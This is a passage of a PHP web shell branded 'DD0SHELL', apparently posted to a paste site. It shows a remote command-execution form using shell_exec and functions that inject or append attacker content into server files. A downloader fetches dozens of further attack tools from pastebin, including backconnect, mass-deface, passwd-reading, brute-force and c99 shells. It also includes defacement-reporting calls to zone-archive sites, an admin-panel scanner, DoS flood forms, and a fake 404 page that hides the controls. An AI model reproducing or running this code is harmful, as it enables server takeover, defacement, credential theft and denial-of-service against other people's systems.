  1516. curl_setopt ($ch, CURLOPT_URL, "http://dark-h.org/notify/kaydet.php");
  1517. curl_setopt ($ch, CURLOPT_POSTFIELDS, "hacker=$defacer&site=$url&gkodumuz=123456&zgkod=123456&kod=123456");
  1518. curl_exec ($ch);
  1519. echo "$url<br>";
  1520. break;
  1521. case "aljyyosh.org";
  1522. curl_setopt ($ch, CURLOPT_URL, "http://aljyyosh.org/single.php");
  1523. curl_setopt ($ch, CURLOPT_COOKIE, "alj=aljyyosh");
  1524. curl_setopt ($ch, CURLOPT_POSTFIELDS, "hacker=$defacer&site=$url&how=1&why=1&addsite=Send");
  1525. if (preg_match ("/<font color=red> OK<\/font>/", curl_exec ($ch)))
  1526. echo "$url&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<span style='color: green'>OK</span><br>";
  1527. else
  1528. echo "$url&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<span style='color: red'>Error</span><br>";
  1529. break;
  1530. default:
  1531. break;
  1532. }
  1533. curl_close ($ch);
  1534. }
  1535. }
  1536.  
  1537. function shape(){
  1538. echo '<title>itsokyesrproblembro</title><style>body {background-image: url(https://wallpaperscraft.ru/image/super_sonico_anime_devushka_majka_96475_1280x1024.jpg);background-repeat: repeat-y, repeat-y;background-attachment: fixed, fixed;}
  1539. </style><body background="https://wallpaperscraft.ru/image/super_sonico_anime_devushka_majka_96475_1280x1024.jpg"></body>';
  1540. print '<!DOCTYPE html>
  1541. <html><head><title></title></head><body><center><h1>DD0SHELL</h1></center>
  1542. <hr align="center" width="1350" size="2" color="#A9A9A9" /><br></body></html>';
  1543. $index = $_SERVER['DOCUMENT_ROOT'].'/index.php';
  1544. }
  1545.  
  1546. function incode(){
  1547. shape();
  1548. print '<center><h2 style="color:#ff0000">Inject code</h2></center>';
  1549. print "<center><form method='POST' action=''>
  1550. <input type='text' name='namefile' placeholder='name'><br/>
  1551. <input type='text' name='dir' value=".$_SERVER['DOCUMENT_ROOT'].'/'."><br/><br/>
  1552. <textarea cols='100' rows='10' placeholder='text' name='dor'></textarea><br/><br/>
  1553. <input type='submit' name='enter' value='Inject'>
  1554. </form></center>";
  1555.  
  1556. if(isset($_POST['enter'])){
  1557. $f = fopen($_POST['dir'].$_POST['namefile'], "w");
  1558. fwrite($f, $_POST['dor']);
  1559. fclose($f);
  1560. }
  1561. print '<div class="layer1"><hr align="center" size="2" color="#A9A9A9" /></div>';
  1562. }
  1563.  
  1564. function infection(){
  1565. shape();
  1566. if (isset($_GET['home'])){
  1567. $fp = fopen($_GET['home'], 'a+');
  1568. fwrite($fp, "\r\n".$_GET['inf']);
  1569. echo "<center><h3>Good</h3></center>";
  1570. fclose($fp);
  1571. }
  1572. print '<div class="layer1"><hr align="center" size="2" color="#A9A9A9" /></div>';
  1573. }
  1574.  
  1575. // revslider.php ---
  1576. function adminfinder(){
  1577. shape();
  1578. echo'
  1579. <center><form action ="" method="post">
  1580. <font face=Verdana size=-2 color=wgite >URL : <input type ="text" name="site"/>
  1581. <input type = "submit" value="Find" />
  1582. </form><br/><br/>';
  1583. $site = $_POST['site'];
  1584. $list = array(
  1585. '/phpMyAdmin/','/phpmyadmin/','/PMA/','/pma/','/admin/','/dbadmin/','/DB_ADMIN/','/db_admin/','/DBA/','/SQLI/','/dba/','/sqli/','/mysql/','/myadmin/','/phpmyadmin2/','/phpMyAdmin2/','/phpMyAdmin-2/','/php-my-admin/','/phpMyAdmin-2.2.3/','/phpMyAdmin-2.2.6/','/phpMyAdmin-2.5.1/','/phpMyAdmin-2.5.4/','/phpMyAdmin-2.5.5-rc1/','/phpMyAdmin-2.5.5-rc2/','/phpMyAdmin-2.5.5/','/phpMyAdmin-2.5.5-pl1/','/phpMyAdmin-2.5.6-rc1/','/phpMyAdmin-2.5.6-rc2/','/phpMyAdmin-2.5.6/','/phpMyAdmin-2.5.7/','/phpMyAdmin-2.5.7-pl1/','/phpMyAdmin-2.6.0-alpha/','/phpMyAdmin-2.6.0-alpha2/','/phpMyAdmin-2.6.0-beta1/','/phpMyAdmin-2.6.0-beta2/','/phpMyAdmin-2.6.0-rc1/','/phpMyAdmin-2.6.0-rc2/','/phpMyAdmin-2.6.0-rc3/','/phpMyAdmin-2.6.0/','/phpMyAdmin-2.6.0-pl1/','/phpMyAdmin-2.6.0-pl2/','/phpMyAdmin-2.6.0-pl3/','/phpMyAdmin-2.6.1-rc1/','/phpMyAdmin-2.6.1-rc2/','/phpMyAdmin-2.6.1/','/phpMyAdmin-2.6.1-pl1/','/phpMyAdmin-2.6.1-pl2/','/phpMyAdmin-2.6.1-pl3/','/phpMyAdmin-2.6.2-rc1/','/phpMyAdmin-2.6.2-beta1/','/phpMyAdmin-2.6.2-rc1/','/phpMyAdmin-2.6.2/','/phpMyAdmin-2.6.2-pl1/','/phpMyAdmin-2.6.3/','/phpMyAdmin-2.6.3-rc1/','/phpMyAdmin-2.6.3/','/phpMyAdmin-2.6.3-pl1/','/phpMyAdmin-2.6.4-rc1/','/phpMyAdmin-2.6.4-pl1/','/phpMyAdmin-2.6.4-pl2/','/phpMyAdmin-2.6.4-pl3/','/phpMyAdmin-2.6.4-pl4/','/phpMyAdmin-2.6.4/','/phpMyAdmin-2.7.0-beta1/','/phpMyAdmin-2.7.0-rc1/','/phpMyAdmin-2.7.0-pl1/','/phpMyAdmin-2.7.0-pl2/','/phpMyAdmin-2.7.0/','/phpMyAdmin-2.8.0-beta1/','/phpMyAdmin-2.8.0-rc1/','/phpMyAdmin-2.8.0-rc2/','/phpMyAdmin-2.8.0/','/phpMyAdmin-2.8.0.1/','/phpMyAdmin-2.8.0.2/','/phpMyAdmin-2.8.0.3/','/phpMyAdmin-2.8.0.4/','/phpMyAdmin-2.8.1-rc1/','/phpMyAdmin-2.8.1/','/phpMyAdmin-2.8.2/','/sqlmanager/','/mysqlmanager/','/p/m/a/','/PMA2005/','/pma2005/','/dev/','/phpmanager/','/php-myadmin/','/phpmy-admin/','/webadmin/','/sqlweb/','/websql/','/webdb/','/mysqladmin/','/mysql-admin/','/mya/','/PhpMyAdmin/','/phpmyadmin/','/myadmin/','/mysql/','/sql/','/server/','/db/','/database/','/databases/','/adm/','/configuration/','/configure/','/administrator/','/login/','/moderator/','/controlpanel/','/adminpanel/','/admincontrol/','/fileadmin/','/data/','/postgresql/','/oracle/','/msssql/','/msaccess/','/sysadmin/','/serverdata/','/webadmin/','/admins/','/Database_Administration/','/WebAdmin/','/useradmin/','/sysadmins/','/admin1/','/system-administration/','/administrators/','/pgadmin/','/directadmin/','/staradmin/','/ServerAdministrator/','/SysAdmin/','/administer/','/LiveUser_Admin/','/sys-admin/','/typo3/','/panel/','/xlogin/','/smblogin/','/phpldapadmin/','/server_admin/','/database_administration/','/system_administration/','/ss_vms_admin_sm/','/adminarea/','/MySQL/','/mysql_admin/','/server_data/','/DB/','/DB1/','/DB2/','/DB3/','/DB4/','/DB5/','/DB6/','/DB7/','/DB8/','/DB9/','/DB0/','/db1/','/db2/','/db3/','/db4/','/db5/','/db6/','/db7/','/db8/','/db9/','/db0/','/mysql5/','/mysql4/','/root/','/apache/','/php/','/Apache/','/Php/','/apach/','/apachepanel/','/WEBSERVERS/','/DATABASE1/','/DATABASE2/','/DATABASE3/','/DATABASE4/','/DATABASE5/','/DATABASE6/','/DATABASE7/','/DATABASE8/','/DATABASE9/','/WEBDATA/','/WEB_DATA/','/webservers/','/database1/','/database2/','/database3/','/database4/','/database5/','/database6/','/database7/','/database8/','/database9/','/webdata/','/web_data/','/admin/login.php','/adm','/admin/','/admin1.html/ADMIN/','/wp-login.php','wp-admin.php','/wp-login/','/moderator/admin.php','/login.html','/login.php','/admin/account.php','/administrator/index.html','administrator.php','/admincontrol.html','/admin_area/login.html','/admincontrol/login.asp','/administrator/login.asp',);
  1586. if(isset($site)){
  1587. foreach($list as $path => $test) {
  1588. $ch = curl_init();
  1589. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1590. curl_setopt($ch, CURLOPT_HEADER, 1);
  1591. curl_setopt($ch, CURLOPT_URL, $site.$test);
  1592. $result = curl_exec($ch);
  1593. curl_close($ch);
  1594. if (preg_match("/200 OK/", $result)){
  1595. echo "<br /><b><font face=Verdana size=-2 color=green >[+]</font><font face=Verdana size=-2 color=silver > Found ==> </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font></b>";
  1596. }else if (preg_match("/401 Unauthorized/", $result)) {
  1597. echo "<br /><b><font face=Verdana size=-2 color=yellow >[!]</font><font face=Verdana size=-2 color=silver > Found ==> </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font><a>[ $site$test ]</A></font></b>";
  1598. echo "<br /><b><font face=Verdana size=-2 color=red >[-]</font><font face=Verdana size=-2 color=silver > Nothing found on </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font><a>[$site$test]</a></font>";
  1599. }
  1600. }
  1601. echo "<br><b><u><font face=Verdana size=-2 color=#513912 >Scan Finished !</font></u></b></center>";
  1602. }
  1603. print '<div class="layer1"><hr align="center" size="2" color="#A9A9A9" /></div>';
  1604. }
  1605. // ---
  1606. function uploadshell(){
  1607. shape();
  1608. print '<center><form method="Post">
  1609. <input type="text" placeholder="command" name="exe">
  1610. <input type="submit" value="Run" name="button11"></center>';
  1611.  
  1612. echo "[#] Uname: ".php_uname()."<br/>";
  1613.  
  1614. if (isset($_POST['button11'])){
  1615. $cmd = $_POST['exe'];
  1616. echo "<pre>".shell_exec($cmd)."</pre>";
  1617. }
  1618. print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
  1619.  
  1620. echo "[#] Document_root: ".$_SERVER['DOCUMENT_ROOT']."<br/><br/>";
  1621. echo 'Antichat'.up('http://pastebin.com/raw/MdY7Dgyw','anti.php').'<br/>';
  1622. echo 'Xploit'.up('http://pastebin.com/raw/tU9b7BKC','Xploit.php').'<br/>';
  1623. echo 'Adminfinder'.up('http://pastebin.com/raw/ipxDn3Ar','adminfinder.php').'<br/>';
  1624. echo 'Bruteword'.up('http://pastebin.com/raw/veDLmYJ4','bruteword.php').'<br/>';
  1625. echo 'noname'.up('http://pastebin.com/raw/Khq6PSWy','noname.php').'<br/>';
  1626. echo 'Zone'.up('http://pastebin.com/raw/tiveWW1v','Zone.php').'<br/>';
  1627. echo 'Func'.up('http://pastebin.com/raw/F2n4GHn8','func.php').'<br/>';
  1628. echo 'Backconnect'.up('http://pastebin.com/raw/fWeEbFMH','backconnect.php').'<br/>';
  1629. echo 'Bruteword1'.up('http://pastebin.com/raw/5TNpWMP5','bruteword1.php').'<br/>';
  1630. echo 'dk'.up('http://pastebin.com/raw/QpwU6wPj','dk.php').'<br/>';
  1631. echo 'Mass'.up('http://pastebin.com/raw.php?i=2unsX5e2','Mass.php').'<br/>';
  1632. echo 'passwd'.up('http://pastebin.com/raw.php?i=KbwUY0aR','passwd.php').'<br/>';
  1633. echo 'k2ll33d'.up('http://pastebin.com/raw.php?i=8mwwA4V2','k2ll33d.php').'<br/>';
  1634. echo 'bot1'.up('http://pastebin.com/raw/tRAjFDAv','bot1.php').'<br/>';
  1635. echo 'bot'.up('http://pastebin.com/raw/Fz2ZWNgF','bot.php').'<br/>';
  1636. echo 'FTP'.up('http://pastebin.com/raw/kmPsizY0','ftp.php').'<br/>';
  1637. echo 'Minishell'.up('http://pastebin.com/raw/cNfwjDmm','minishell.php').'<br/>';
  1638. echo 'Sym'.up('http://pastebin.com/raw.php?i=NX74fQQU','sym.php').'<br/>';
  1639. echo 'Mass1'.up('http://pastebin.com/raw/nsfz9BGL','Mass1.php').'<br/>';
  1640. echo 'Users'.up('http://pastebin.com/raw.php?i=5VKD1nEk','users.php').'<br/>';
  1641. echo 'Revslider'.up('http://pastebin.com/raw/CM0W3Jek','revslider.php').'<br/>';
  1642. echo 'mail'.up('http://pastebin.com/raw/7pBsXL2H','mail.php').'<br/>';
  1643. echo 'php.ini'.up('http://pastebin.com/raw.php?i=Te1e1uhA','php.ini').'<br/>';
  1644. echo 'FOX'.up('http://pastebin.com/raw/fLqQ62Bd','fox.php').'<br/>';
  1645. echo 'Cipher'.up('http://pastebin.com/raw/99xc9crf','cipher.php').'<br/>';
  1646. echo 'bot2'.up('http://pastebin.com/raw/uHUyd8yc','bot2.php').'<br/>';
  1647. echo 'Function'.up('http://pastebin.com/raw/aBN0WC14','function.php').'<br/>';
  1648. echo 'Exploit'.up('http://pastebin.com/raw/90Beie2E','exploit.php').'<br/>';
  1649. echo 'Mailer'.up('http://pastebin.com/raw/s30CZvvB','mailer.php').'<br/>';
  1650. echo 'Cpanel'.up('http://pastebin.com/raw/rBjXvT0C','cpanel.php').'<br/>';
  1651. echo 'up'.up('http://pastebin.com/raw/7Za5r5FT','up.php').'<br/>';
  1652. echo 'Dhanush'.up('http://pastebin.com/raw/X1hQW745','Dhanush.php').'<br/>';
  1653. echo 'Deface'.up('http://pastebin.com/raw/bRHGGFfj','deface.php').'<br/>';
  1654. echo 'exp'.up('http://pastebin.com/raw/f6sEkprB','exp.php').'<br/>';
  1655. echo 'Mass_shell_upload'.up('http://pastebin.com/raw/tRLpdMYx','Mass_shell_upload.php').'<br/>';
  1656. echo 'Revol'.up('https://pastebin.com/raw/ABXVvRbP','Revol.php').'<br/>';
  1657. echo '404'.up('http://pastebin.com/raw/fjqBQXQF','404.php').'<br/>';
  1658. echo 'Cihshell'.up('http://pastebin.com/raw/RNWLpGZn','cihshell.php').'<br/>';
  1659. echo "dos".up('http://pastebin.com/raw/QxR7z13U','dos.php').'<br/>';
  1660. echo "dosSNOX".up('http://pastebin.com/raw/cUjqeMLR','dosSNOX.php').'<br/>';
  1661. echo "gravity_shell.php".up('http://pastebin.com/raw/aCqsxs0m','gravity_shell.php').'<br/>';
  1662. echo "up_wordpress".up('http://pastebin.com/raw/d122X3Hqbreak','upwsord').'<br/>';
  1663. }
  1664.  
  1665. function shape1(){
  1666. echo '<title>DD0SHELL</title><body background="https://temporarytattoos.com/pub/media/catalog/product/cache/image/700x560/e9c3970ab036de70892d86c6d221abfe/h/i/hipster-fox-temporary-tattoo-6222.jpg"></body>';
  1667. print '<!DOCTYPE html>
  1668. <html><head><title></title></head><body><center><h1>DD0SHELL</h1></center>
  1669. <hr align="center" width="1350" size="2" color="#A9A9A9" /><br></body></html>';
  1670. $index = $_SERVER['DOCUMENT_ROOT'].'/index.php';
  1671. }
  1672.  
  1673. function shapeddos(){
  1674. print "<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>";
  1675. }
  1676.  
  1677. if(isset($_POST['f'])){ $f = fopen($_POST['name'], 'w'); fwrite($f, $_POST['f']); fclose($f); }
  1678.  
  1679. function default1(){ @ob_start();
  1680. print "<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body link='black' vlink='black' alink='black'><h1>Not Found</h1><p>The requested URL ".$_SERVER['PHP_SELF']." was <a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=root>not found</a> on this server.</p><p>Additionally, a <a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=port>404</a> Not Found <a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=info> error </a> was encountered <a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=fox>while </a> trying to <a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=incode>use</a> an ErrorDocument to handle the <a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=disable>request </a>.</p></body></html>";
  1681. die();
  1682. exit();
  1683. }
  1684.  
  1685. function script(){
  1686. print '<script type="text/javascript">
  1687. function locs(){
  1688. document.location.href="'.$_GET['address'].'";
  1689. }
  1690. setTimeout("locs()", 20);
  1691. </script>';
  1692. }
  1693.  
  1694. if ($_REQUEST['action'] == "status"){print "Good";}
  1695. switch ($_REQUEST['action']){
  1696. case 'sql_inj':sql_inj();
  1697. break;
  1698. case 'disable':disable1();
  1699. break;
  1700. case 'root':Readfile1();
  1701. break;
  1702. case 'infophp':infophp();
  1703. break;
  1704. case 'port':scannport();
  1705. break;
  1706. case 'mysql':mysql1();
  1707. break;
  1708. case 'adminfinder':adminfinder();
  1709. break;
  1710. case 'uploadshell':uploadshell();
  1711. break;
  1712. case 'mass_deface':mass_shell();
  1713. break;
  1714. case 'fox':fox();
  1715. break;
  1716. case 'hash':hash1();
  1717. break;
  1718. case 'attack_http1':attack_http1();
  1719. break;
  1720. case 'ddosintelpost':ddosintelpost();
  1721. break;
  1722. case 'ddospingpanel':ddospingpanel();
  1723. break;
  1724. case 'doSlowpost':doSlowpost();
  1725. break;
  1726. case 'ftp':brute();
  1727. break;
  1728. case 'incode':incode();
  1729. break;
  1730. case 'info':info();
  1731. break;
  1732. case 'spam':spam();
  1733. break;
  1734. case 'word':word();
  1735. break;
  1736. case 'ddos':ddos();
  1737. break;
  1738. case 'ddos2':ddos2();
  1739. break;
  1740. case 'ddos3':ddos3();
  1741. break;
  1742. case 'ddos4':ddos4();
  1743. break;
  1744. case 'ddos5':ddos5();
  1745. break;
  1746. case 'doSlow':doSlow();
  1747. break;
  1748. case 'ddosintel':ddosintel();
  1749. break;
  1750. case 'attack_http':attack_http();
  1751. break;
  1752. case "ab":
  1753. $url = $_POST['url'];
  1754. $c = $_POST['c'];
  1755. $n = $_POST['n'];
  1756. cmdexec("ab -c $c -n $n $url");
  1757. break;
  1758. //Доп-функции---------------------------------------------------------------------------------------------------------------------------------------------------
  1759. case 'IndoXploit':
  1760. echo up('http://pastebin.com/raw/tU9b7BKC','Xploit.php');
  1761. break;
  1762. case 'finder':
  1763. echo up('http://pastebin.com/raw/ipxDn3Ar','adminfinder.php');
  1764. break;
  1765. case 'brute':
  1766. echo up('http://pastebin.com/raw/veDLmYJ4','bruteword.php');
  1767. break;
  1768. case 'noname':
  1769. echo up('http://pastebin.com/raw/Khq6PSWy','noname.php');
  1770. break;
  1771. case 'Zone-h':
  1772. echo up('http://pastebin.com/raw/tiveWW1v','Zone.php');
  1773. break;
  1774. case 'wso':
  1775. echo up('http://pastebin.com/raw/F2n4GHn8','func.php');
  1776. break;
  1777. case 'brute1':
  1778. echo up('http://pastebin.com/raw/5TNpWMP5','bruteword1.php');
  1779. break;
  1780. case 'dk':
  1781. echo up('http://pastebin.com/raw/QpwU6wPj','dk.php');
  1782. break;
  1783. case "Mass-Deface":
  1784. echo up('http://pastebin.com/raw.php?i=2unsX5e2','Mass.php');
  1785. break;
  1786. case "etcpasswd":
  1787. echo up('http://pastebin.com/raw.php?i=KbwUY0aR','passwd.php');
  1788. break;
  1789. case "k2ll33d shell":
  1790. echo up('http://pastebin.com/raw.php?i=8mwwA4V2','k2ll33d.php');
  1791. break;
  1792. case 'foreignbote':
  1793. echo up('http://pastebin.com/raw/Fz2ZWNgF','foreignbote.php');
  1794. break;
  1795. case 'ftpbrute':
  1796. echo up('http://pastebin.com/raw/kmPsizY0','ftp.php');
  1797. break;
  1798. case 'mini':
  1799. echo up('http://pastebin.com/raw/cNfwjDmm','minishell.php');
  1800. break;
  1801. case "Symlinker":
  1802. echo up('http://pastebin.com/raw.php?i=NX74fQQU','sym.php');
  1803. break;
  1804. case "server users":
  1805. echo up('http://pastebin.com/raw.php?i=5VKD1nEk','users.php');
  1806. break;
  1807. case 'revslider':
  1808. echo up('http://pastebin.com/raw/CM0W3Jek','revslider.php');
  1809. break;
  1810. case 'mail':
  1811. echo up('http://pastebin.com/raw/7pBsXL2H','mail.php');
  1812. break;
  1813. case "safe mode":
  1814. echo up('http://pastebin.com/raw.php?i=Te1e1uhA','php.ini');
  1815. break;
  1816. case 'spamfox':
  1817. echo up('http://pastebin.com/raw/fLqQ62Bd','fox.php');
  1818. break;
  1819. case 'cipher':
  1820. echo up('http://pastebin.com/raw/99xc9crf','cipher.php');
  1821. break;
  1822. case 'bot':
  1823. echo up('http://pastebin.com/raw/uHUyd8yc','bot.php');
  1824. break;
  1825. case 'dosbot':
  1826. echo up('http://pastebin.com/raw/aBN0WC14','function.php');
  1827. break;
  1828. case 'exploit':
  1829. echo up('http://pastebin.com/raw/90Beie2E','exploit.php');
  1830. break;
  1831. case 'cpanel':
  1832. echo up('http://pastebin.com/raw/rBjXvT0C','cpanel.php');
  1833. break;
  1834. case 'up':
  1835. echo up('http://pastebin.com/raw/7Za5r5FT','up.php');
  1836. break;
  1837. case 'Dhanush':
  1838. echo up('http://pastebin.com/raw/X1hQW745','Dhanush.php');
  1839. break;
  1840. case 'Deface':
  1841. echo up('http://pastebin.com/raw/bRHGGFfj','deface.php');
  1842. break;
  1843. case 'Massup':
  1844. echo up('http://pastebin.com/raw/tRLpdMYx','Mass_shell_upload.php');
  1845. break;
  1846. case '404':
  1847. echo up('http://pastebin.com/raw/fjqBQXQF','404.php');
  1848. break;
  1849. case 'cihshell':
  1850. echo up('http://pastebin.com/raw/RNWLpGZn','cihshell.php');
  1851. break;
  1852. case 'c99':
  1853. echo up('http://pastebin.com/raw/q9H31DKU','c99.php');
  1854. break;
  1855. case 'dos':
  1856. echo up('http://pastebin.com/raw/QxR7z13U','dos.php');
  1857. break;
  1858. case 'dosSNOX':
  1859. echo up('http://pastebin.com/raw/cUjqeMLR','dosSNOX.php');
  1860. break;
  1861. case 'gravity_shell':
  1862. echo up('http://pastebin.com/raw/aCqsxs0m','gravity_shell.php');
  1863. break;
  1864. case 'a.out':
  1865. echo up('http://pastebin.com/raw/Z9dTVpLp','a.out');
  1866. break;
  1867. case 'log':
  1868. echo up('http://pastebin.com/raw/FiDy6d4F','whitecat.c');
  1869. break;
  1870. case 'up_wordpress':
  1871. echo up('http://pastebin.com/raw/d122X3Hqbreak','upwsord.php');
  1872. break;
  1873. case 'ddospost':
  1874. echo up('http://pastebin.com/raw/9XL4dpCz','func.php');
  1875. break;
  1876. case 'doshell':
  1877. echo up('http://pastebin.com/raw/yR5mDkAs','adm.php');
  1878. break;
  1879. default:default1();
  1880. break;
  1881. }
  1882. function up($input,$output){
  1883. @mkdir('tools');
  1884. @chdir('./tools');
  1885. if(!file_exists($output)){
  1886. $m = @file_get_contents($input);
  1887. $save = fopen("$output", "w"); fwrite($save, $m); fclose($save);
  1888. return "<br>[#]DoNe: <a href=\"./tools/$output\"> Go to Here </a><br/>";
  1889. }else{ return "<br>[#] Allready Here : <a href=\"./tools/$output\"> Go to Here </a><br/>"; }
  1890. }
  1891.  
  1892.  
  1893. function but(){
  1894. print '<html>
  1895. <head>
  1896. <title>example</title>
  1897. <style type="text/css">
  1898. textarea { width: 500px; height: 250px; border: 1px solid #000000; margin: 5px auto; padding: 7px; }
  1899. input[class="b1"] { width: 250px; height: 25px; border: 1px solid #000000; background: transparent; margin: 8px auto; float: left; margin-left: 20.5%;}
  1900. </style>
  1901. </head>
  1902.  
  1903. <body>
  1904. <center>
  1905. <div id="123111" title="slowread">
  1906. <form method="post">
  1907. <input type="text" name="ipslow" placeholder="ip">
  1908. <input type="text" name="time" placeholder="time">
  1909. <input type="submit" value="attack" name="go2">
  1910. </form>
  1911. </div>
  1912.  
  1913.  
  1914. <div><input type="button" value="slowread" class="b1"></div>
  1915. <script src="http://code.jquery.com/jquery-1.10.2.js"></script>
  1916. <script src="http://code.jquery.com/ui/1.11.0/jquery-ui.js"></script>
  1917. <link rel="stylesheet" href="http://code.jquery.com/ui/1.11.0/themes/smoothness/jquery-ui.css">
  1918. <script>
  1919. var dialog = $("#123111").dialog({autoOpen: false});
  1920. $("input[value=slowread]").click(function ()
  1921. {
  1922. dialog.dialog( "open" );
  1923. });
  1924. </script>
  1925.  
  1926.  
  1927. <div id="dialo" title="udpflood">
  1928. <form method="post">
  1929. <input type="text" name="ip1" placeholder="ip">
  1930. <input type="text" name="time1" placeholder="time">
  1931. <input type="submit" value="attack" name="go">
  1932. </form>
  1933. </div>
  1934.  
  1935.  
  1936. <div><input type="button" value="udpflood" class="b1"></div>
  1937. <script src="http://code.jquery.com/jquery-1.10.2.js"></script>
  1938. <script src="http://code.jquery.com/ui/1.11.0/jquery-ui.js"></script>
  1939. <link rel="stylesheet" href="http://code.jquery.com/ui/1.11.0/themes/smoothness/jquery-ui.css">
  1940. <script>
  1941. var dialo = $("#dialo").dialog({autoOpen: false});
  1942. $("input[value=udpflood]").click(function ()
  1943. {
  1944. dialo.dialog( "open" );
  1945. });
  1946. </script>
  1947.  
  1948.  
  1949.  
  1950. <div id="122234" title="doSlow">
  1951. <form method="post">
  1952. <input type="text" name="dohost" placeholder="ip">
  1953. <input type="text" name="time" placeholder="time">
  1954. <input type="submit" value="attack" name="go3">
  1955. </form>
  1956. </div>
  1957.  
  1958. <div><input type="button" value="doSlow" class="b1"></div>
  1959. <script src="http://code.jquery.com/jquery-1.10.2.js"></script>
  1960. <script src="http://code.jquery.com/ui/1.11.0/jquery-ui.js"></script>
  1961. <link rel="stylesheet" href="http://code.jquery.com/ui/1.11.0/themes/smoothness/jquery-ui.css">
  1962. <script>
  1963. var dial = $("#122234").dialog({autoOpen: false});
  1964. $("input[value=doSlow]").click(function ()
  1965. {
  1966. dial.dialog( "open" );
  1967. });
  1968. </script>
  1969.  
  1970. <div id="12345" title="postflood">
  1971. <form method="post">
  1972. <input type="text" name="server1" placeholder="ip">
  1973. <input type="text" name="host1" placeholder="host">
  1974. <input type="submit" value="attack" name="go3">
  1975. </form>
  1976. </div>
  1977.  
  1978.  
  1979. <div><input type="button" value="postflood" class="b1"></div>
  1980. <script src="http://code.jquery.com/jquery-1.10.2.js"></script>
  1981. <script src="http://code.jquery.com/ui/1.11.0/jquery-ui.js"></script>
  1982. <link rel="stylesheet" href="http://code.jquery.com/ui/1.11.0/themes/smoothness/jquery-ui.css">
  1983. <script>
  1984. var dia = $("#12345").dialog({autoOpen: false});
  1985. $("input[value=postflood]").click(function ()
  1986. {
  1987. dia.dialog( "open" );
  1988. });
  1989. </script>
  1990.  
  1991.  
  1992. <div id="123456" title="ddosintel">
  1993. <form method="post">
  1994. <input type="text" name="ip" placeholder="ip">
  1995. <input type="submit" value="attack" name="go3">
  1996. </form>
  1997. </div>
  1998.  
  1999.  
  2000. <div><input type="button" value="ddosintel" class="b1"></div>
  2001. <script src="http://code.jquery.com/jquery-1.10.2.js"></script>
  2002. <script src="http://code.jquery.com/ui/1.11.0/jquery-ui.js"></script>
  2003. <link rel="stylesheet" href="http://code.jquery.com/ui/1.11.0/themes/smoothness/jquery-ui.css">
  2004. <script>
  2005. var di = $("#123456").dialog({autoOpen: false});
  2006. $("input[value=ddosintel]").click(function ()
  2007. {
  2008. di.dialog( "open" );
  2009. });
  2010. </script>
  2011.  
  2012.  
  2013. <div id="1234567" title="tcpflood">
  2014. <form method="POST">
  2015. <input type="text" name="ip2" placeholder="ip">
  2016. <input type="text" name="time2" placeholder="time">
  2017. <input type="submit" value="attack" name="go9">
  2018. </form>
  2019. </div>
  2020.  
  2021.  
  2022. <div><input type="button" value="tcpflood" class="b1"></div>
  2023. <script src="http://code.jquery.com/jquery-1.10.2.js"></script>
  2024. <script src="http://code.jquery.com/ui/1.11.0/jquery-ui.js"></script>
  2025. <link rel="stylesheet" href="http://code.jquery.com/ui/1.11.0/themes/smoothness/jquery-ui.css">
  2026. <script>
  2027. var d = $("#1234567").dialog({autoOpen: false});
  2028. $("input[value=tcpflood]").click(function ()
  2029. {
  2030. d.dialog( "open" );
  2031. });
  2032. </script>
  2033.  
  2034.  
  2035.  
  2036. <div id="12345678" title="attack_http">
  2037. <form method="post">
  2038. <input type="text" name="mhtd" placeholder="mhtd">
  2039. <input type="text" name="host" placeholder="host">
  2040. <input type="text" name="server" placeholder="server">
  2041. <input type="submit" value="attack" name="go3">
  2042. </form>
  2043. </div>
  2044.  
  2045.  
  2046. <div><input type="button" value="attack_http" class="b1"></div>
  2047. <script src="http://code.jquery.com/jquery-1.10.2.js"></script>
  2048. <script src="http://code.jquery.com/ui/1.11.0/jquery-ui.js"></script>
  2049. <link rel="stylesheet" href="http://code.jquery.com/ui/1.11.0/themes/smoothness/jquery-ui.css">
  2050. <script>
  2051. var b = $("#12345678").dialog({autoOpen: false});
  2052. $("input[value=attack_http]").click(function ()
  2053. {
  2054. b.dialog( "open" );
  2055. });
  2056. </script>
  2057.  
  2058. <div id="123456789" title="tcpconnect">
  2059. <form method="post">
  2060. <input type="text" name="tcpcon" placeholder="ip">
  2061. <input type="text" name="port" placeholder="port">
  2062. <input type="text" name="time" placeholder="time">
  2063. <input type="submit" value="attack" name="go3">
  2064. </form>
  2065. </div>
  2066.  
  2067.  
  2068. <div><input type="button" value="tcpconnect" class="b1"></div>
  2069. <script src="http://code.jquery.com/jquery-1.10.2.js"></script>
  2070. <script src="http://code.jquery.com/ui/1.11.0/jquery-ui.js"></script>
  2071. <link rel="stylesheet" href="http://code.jquery.com/ui/1.11.0/themes/smoothness/jquery-ui.css">
  2072. <script>
  2073. var f = $("#123456789").dialog({autoOpen: false});
  2074. $("input[value=tcpconnect]").click(function ()
  2075. {
  2076. f.dialog( "open" );
  2077. });
  2078. </script>
  2079. </center>
  2080. </body>
  2081. </html>';
  2082. }
  2083. ?>
Add Comment
Please, Sign In to add comment